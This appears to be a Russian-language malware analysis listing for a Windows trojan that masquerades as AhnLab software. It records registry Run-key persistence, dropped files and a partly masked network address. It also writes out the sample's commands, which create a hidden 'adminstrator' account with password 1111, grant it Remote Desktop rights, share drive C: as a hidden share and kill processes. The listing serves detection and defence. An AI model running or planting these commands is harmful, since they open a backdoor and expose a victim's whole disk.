Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'NextInstance' = '<SYSTEM32>\alg32.com'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'AhnLab Session Process' = '<SYSTEM32>\ACASP.com'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'AhnLab' = '<SYSTEM32>\AhnLab.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\AhnLab Application Service] 'ImagePath' = '%CommonProgramFiles%\AhnLab\ACA\ACAAC.exe'
- <SYSTEM32>\AhnLab.exe
- <SYSTEM32>\alg32.com
- <SYSTEM32>\ACASP.com
- <SYSTEM32>\net1.exe localgroup "Power Users" adminstrator /add
- <SYSTEM32>\net1.exe localgroup "Remote Desktop Users" adminstrator /add
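- <SYSTEM32>\net1.exe share dsc_UFG$=c:\ (прим.: команда открывает общий доступ ко всему диску C:; суффикс «$» в имени скрывает ресурс из обычного списка сетевых ресурсов)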
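- <SYSTEM32>\net1.exe localgroup %USERNAME%s adminstrator /add (прим.: имя группы «%USERNAME%s», вероятно, получено автоматической подстановкой имени пользователя среды анализа; исходное имя группы на странице не приведено)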
- <SYSTEM32>\cmd.exe /c C:\1.bat
- <SYSTEM32>\taskkill.exe /F /IM NavyShareCleaner.exe /IM NETENUM.exe
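- <SYSTEM32>\net1.exe user /add adminstrator 1111 (прим.: имя учётной записи «adminstrator» во всех командах записано именно так, без буквы «i» после «admin»; при поиске по журналам и списку локальных пользователей следует использовать это написание)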
- <SYSTEM32>\VB6KO.DLL
- <SYSTEM32>\AhnLab.exe
- C:\1.bat
- <SYSTEM32>\Mswinsck.ocx
- <SYSTEM32>\ACASP.com
- <SYSTEM32>\ufg_dsc.dll
- <SYSTEM32>\alg32.com
- <SYSTEM32>\AdmDll.dll
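- '4.#.1.58':80 (прим.: второй октет адреса в источнике заменён символом «#», поэтому запись нельзя использовать как точный сетевой индикатор)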
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''